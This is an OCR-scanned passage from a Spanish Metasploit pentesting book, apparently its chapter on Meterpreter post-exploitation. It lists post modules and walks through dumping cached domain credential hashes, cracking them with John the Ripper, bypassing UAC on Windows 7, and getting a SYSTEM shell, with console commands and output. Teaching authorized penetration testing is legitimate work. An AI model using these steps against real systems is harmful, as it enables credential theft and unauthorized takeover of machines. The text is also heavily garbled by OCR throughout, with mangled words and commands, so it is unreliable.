est/toeaerptrptajeen ee +] nai cp tk Stemcareceetcoeerabol sere “oes Issecessfl set foen7acomectens, PT inate execnte nt emote =a "fe Se cant termservice starts dsablet™ [SF Rindge tf enne <2 76a atep termerice Fs monday vac“ - oad.ene 17 Soeah tw set sare type» eetedesktap note +} Process a6 rented, Tig 420: roe alonaind para cman ySncvca evo RDF,112 E Metosploit para Pentesters Los seripts post pat ers bast on dennis us por ena qu eeacuntan, lpus dees srr Exo de se dpe de ds aegis rinples mull y wide La exert wu sae: arp vos pt ees Metrpcer eh as psf ec indpeiites cei patna Lago nds encarta a ‘Sistemas operatives Windows, oe rine a sett las srs mula kes pet ois ens = Gather 6 tio de sob ‘ert sven paca esecae infomacia de apliines,del ‘sistema, del entorno, de la red, de credenciales de. aplicaciones, ctcéiers, " = ~ Monge tipo de sr penile esto or scrip, General, Permiten realizar acciones de jeccion y cere de reas en Meterpreer, Lot scripts windows son mis varias y espeifios del propio sistema opraivo,permitendo realizar mumerosa taeas sobre la méquina vulnerade. A contiauacidn so a am ontinuaciOn se organizan los diferentes Wireless Scripts Este tipo de serpts proporcionan funcionalidades relacionadas cow ionalides relacionadas con a temitica Wireless 0 ret ioimbvits. 1 bev deat e extend denfmactn deus ieen ‘eden exiatirelmaccondos ela mquina vulneada, En sistemas Windows 70 indore Yate aghiene la contrseia pura redes WPA, mientas que ca Windows XP ge caine I lave PBKDFS Por mencionar algunos, el sriprposthvindowshvlanhvlon_bss_ ls propotiona informacin sole Recon Scripts Est tipo de serpts proporcionan funcinalidad con la que se pueden obtener resolciones de Tombies Ydescubrimiento de dieccones I. Estos scripts wilizan Refgun para Hlevar a eato su Capitulo IV, Meterpreter & Post-Explotation ot Manage Scripts Este tipo de scripts pemite realizar acciones de geti6n sobre la réquina volverad. (lisa de accione es ampliay vara, por allo, se enumeran las mis intresaaes en a siguiente list = Gestiin de usuarios. Los scripts posindowshanagedeereaser © pustindows/ snanoge/ik!_aser domain pensitenrealiar aciones sabe los usavos Ue un oni, srupo de dominios o maquina local. = Gesiin de elemenos dered. La manipulacién de cetfeados ae vealiza mediante of Uso dels scripts pastvindows/manageiject cao postvindowshnanagelremore cu, y Js ‘manipulacin de hosts mediante postvindowshnanageivect hos! o potiinonsinanage! remove_ost EL comand auforofe umbién encuentra presente median el serip post! windowssmanagetautoroute y Ia habiliaién del eseitorio remota se pute hacer con el sett pstivindowslmanagefenable_ rp. ~ Gestion de procesos y payloads. Con eae tipo de serps ie puede compar f miquina ‘ulnerada con cro equipo mediante linyeesin dun neve upload aes dela cjecacia de posthvindows/nanogepayload inject LHOST=<, Léyicamente, el nuevo equipo deberd tener montado el handler exploitinlidhandler pare recibir la sesién, El comando migrate también dispone de un script con postions! managesmigrate = Ejecuciéu de un script de Microsoft Windows PowerSeell, Esta posibilidad dota de Aexibildad y potenci a Mesasploil. En una sesion de Meterprter se puede ejecutar un script de PowerShell yracias al script pastiwindows/nanage/powershelV/exee powershell. Es recomendable visualizarellistado de los scrips de gestén ya que aportan gran flexibildad y potencia a la sesion de Meterpreter. A continuacién se pucde visualizar el listado de scripts Aisponibles fT > Tor pos rons [pst dors eorage/ saeco run postywinowsasoge persistence [ro gst fein manage/actarst® [fan fst tos epee sel ete, pees In Yt indo aaage Sele [ron fostulidos/rnape ep In yst/eindon/aanage/ dua Iron postpwindewsamoge remove co ren gost/uinoes manage enter |r postage renee st an pst lngos/erae/ ren fun pstntes/menape/ is erete [en gst /widorjaange/ageate fr pst /vedas/ eae sist len gost/windorsaanoge/wotL meterreter inject run postlns/etoe/s-tont [ron gost/ninons angen fron postfire set storage [ron pot /odoenange/ pla ru post /vndee/ rae az alcage Fig: List de erp degen de potvindoarae Gather Seripts Los scripts de tipo gather proporcionan funcionalidad para recolestary comprobar tao tipo de informacién en la miquina vulneada. Son los seriis que mis abundan en Areroreter y pueden ayudar y mucho a conocer el estado de la maquina, del entorno y obtener el maxim de informacién, tanto confdeacial como relevant, de dicha maquina.isl Metepiotipara Pees ‘Se puedonorgaizar por tematicas w abjetivos, los cuales se enumeran a coninusesn jcelenines. Los sernt postvindoegotherferedentols aon eapaces de recoge las crodenciales de gran cantidad de aplicaciones o servicios que se encuerten presenter en fs quina vutnerada i ra acti ts enter eretentate/ean tre sare ls st cnet erefentaaven pe se ast ntact ie fe nnegnin feed ictarincy Pestvio pierre Sst ent ig2: Listd de sv praesent en sw verde = = gCmpociones y emmerocios. EL sop psvrindoaerfheckom pei comprar si le miu incase wna vial 9 Ea nee S speci qu tio de sofvare de vtulantn sn tian, Tos seipe ns ‘ecient on anh pounndowvgtherenm puientnman's laa ges ‘ein ppitads. Por eempa se pcen Isr is alco, near ns Inova vlna, ltr les dipoivos gue cone, isa as ses ce ‘recursos comportidos, los fokens, etestera, ° pea fscranans/ether feces Fechner enn peso a pends ete ee tere thse frre rs nesters" [stun Jther/onm ies i423; Lindo de ero pars sarees yeopnen «Fores xin ser para rain bisqueds forests en a mina yulnerade. Por cielo, ein pasvindoaterforentestinge pre rasa a ees en a fate de discos remotos 0 volimenes. El script pastvindowigniierforensctonrn es pert itr as wide y vokimenes dea mina mera ae sop nls pare eliza pequtas pha de mii lens en ra sob sn sna ional pata, Mediante ef uso de pathindowsgatherscreen. spy se relia os, confgurables, por lo que so va roeonstryend fo ara realizar espionaje de pantalla es mejor uit Cito Te Meerpreter & Post-Baporaton no PoC: Obtenienclo hashes de usuarios de dominio nesta breve prichs de concepto se presenta cl siguiente escenater = -Elnuditorha volnerado ana maquina aparentemente noes ura maquina de dominio, Pero 8 ocular el serps posvvindowsgather/eachedump éste observard que hay credencales de usaios de un dominio : -La maquina vulneroda es Windows XP.SP3 y el auditor vies BackTrack 5, 52 punto de partida esl sesin de Meterpreter a lanza el script poavvindows/gaher/eachedkmp se obtendri un listido de usuarios y hashes de comin, ente ellos el administrador del domino, 1Cmo es esto posible? Los sistemas operativos Windows almacenan por detecto, es decir por politic, los itis 1 usuarios que ian inciado sein en ef dominio corectamente, Pata sisters, ‘opeativos Hidows XP/2003 los hashes se almacenan en formato MSCash! y puede ser erackeado ‘de manera répidn, con velocidades de miles de hase por segundo, En sistas operatives Winch" ‘s1a/2008 y superiores se almacenan en vn focato mucho mvs seguro como es MSCash2, ecu hace que se logrenvelocidades 10 veces inferores ala anterior vers del algritio. [esiemnaied > Ton pontiac other exchedng ks) execotiay module agatnst mens: ere Cache Credetiats settIng 10°” (ar 1s 50 ond @ disables, an 18 Ls defaut) fi ebtteing oat ey 1 ontining tse key Io) x7 cmetlste cleat +) obtaining tegen. is} Suoping enced credentits, is} Jet the Roper forea A ‘anteater raesneet ts 8 f602:MTASL oT LocaLt:NETASL AL ldninistraorreadncsebtanssbrdsedeneb49 NETASPLOFT EMA AETASPLTT LUeL tah ‘ee! in WSR fraat (acne) igA2: Ones do hn dono par bs yo ching Ua vez conseguides los hashes se pueden crackear con la ayuda de ls aplicaciones Cain 0 Join The Ripper. Olea opcid a estudiar es la posibildad de utilizar una GPU para agilizar,y mucho, et proceso de fuerza brut, [ear Tate asa TORRE TART Howled 2 password bashes wlth 2 eferent salts (M6 Cache Hash (Generic t4]) sate. instroorl haste. tut Touesses: 2 tine: 1:68 i I aot ATCT Tar TOT 3 1.06 (ETA: FL Aug 31 15:6:50 212) e/a: WHE trytng: 123 - Fig 25: Cringe hs ASC conden The per Escalate Scripts ste tipo de scripts son ala vez min exploits ya que se encargan de intentar elevar privileios en la ‘nquina vulnerada, EI éxito de la ejecucién de ests seripe depende's del sistema operativo donde se ejecuten,| iis 5 Metasploit para Pentesers Uno de los mas Famosos para sistemas Windows XP es posthsindons escalate a 1 XP es posthwindonslescalatelgetsystm. El script posi/windowslescalaterbypassuac permite elevarprivilegis en sistemas Windows 7 0 Windows Visto, y de este modo llegar a sere usuario Stem PoC: Bypass a UAC en Windows 7 con obtencidn de informacion WLAN En esta prueba. de concepto se presenta un escenario en el que el auditor ia explotado una Vlnerabilidad en un sistema como Windows 2, Windows Vista, Windows Server 2008/82, ex este aso se ha referencia siempre Windows 7 El auditor dispone de una sesibn de Meterpreer con un usuario estindar sin privilegios El objtivo «6 clevar priviegias llegando a ser usuario Sjstem y obtener informacion subi las redes wireless ue tiene configurado y wilizar asi la méquina vulnerads, Ademds, de enconirar informacién dit Sobre contasetas de Iss redes wireless, to eual puede apotar una nueva vi lest de ints, investigacin en et ead = wine raterpreter reverse Rast = onsen so PSone teh pare = ate 1 storced reverse handler on 12.18.4446 +) Starting the porto ander seine sia bcs Ge me a ered (sz 84:46 > 90.81.4169) at nz e0-31 e204 fctecreiee > getsystea [ein error runing comand gtsysten:tnterrnt ie > petal ™ Fig 427: eo de elcid prvi sn, Laprimers accién que se intentartes utilizar el serpt de tipo ef u utilizar el script de tipo elewute pa ealiaar un bypass UAC ‘Tras lanzar el script posthvindows/escalatelbypassuae se abliene una nueva sesion de Meterpreter, 0m identificador dstntologicamente. Si se eecuta el comanda sessions ~fen mafconsole se pucle visuatizar que, aprentemente, se dispone de una nueva sesin de Meterpretercon ef mismo uswatio que en la sesibn previa Realmient esto no es cierto, ya que cuando se interactie cos Is nueva sesia de Meterpretery se ejecute la instruccién getsystemy, se obtendré éxito en el intent de elevacion de privilegiosicn la smquina vulnerada Capitulo IY, Meterpreter & Post-Explotation me TET > CON POST RT Ta fe) started reverse handler on 192,168.2, (3) Searting thu poyteas Panter. i+} Uplondiag the bypass UAC eveciable ta the flesysten. is} reterpreterstager executable 2960 bytes Long elng uploaded. is} Uplaated the agent Co the filesysten.».. Pi sending stage (752128 bytes) to 30 1 Heterpreter soztion ? oped (392.2681. 1] session 102 (182.268,1.48:66 -> 192.16,1.42:2886) processing Tnitialautonnscript “wigrl le -1 1 current server process: wFzéuibtsaggy exe (4248) 1) Spuning rotapad.exe process to migrate to grating 20 398 Suceestutly aigrated to process se > 192 68.142 088) at 2812 58-31 67:20:33 > backyroand [Ter erckgromain session 1. jai “explode itancter) > sessions -2 Jpctive sessions 18 ype Information oonection | Y deterpreter mesmo? bit-Pc\palo @ BIY-PC_ 102, 260.1.40844 <> 192,108, 1.42:1879 (092 ae 192. 168,1,40:4944 -> 292.109.1.42:1886, (122. 2 nterpreter xt6puind2 bit as.1.22 eee) igh aun ler pinnacles psiemancter > petratos aut systen (via Technique 3) fisiaseter > yetuid erverserasae: HT AUTHORITY SYSTER featecarater > shell | Iroces 352 created. leanne 3 eveated Icrosert Windows (versio 6.1.76) fcnyrignt {c) 2699 Microsor® Corporation, Reservados tos tos derecns lindo systensanaoan Iona Fig 9: evasion pogo con toon Wins 7. neste punto el auditor dspane de un usuario System con el que fuede realizar cualquier tipo de avcidn in sestticcion en la miquina vulerada, Para ealiza la ebogida de informacién de las redes wireles almacenads en la miquina Mndiows 7 se ejecutan los scrips e tipo wireless, los cuales han sido expliados antriormente, La primera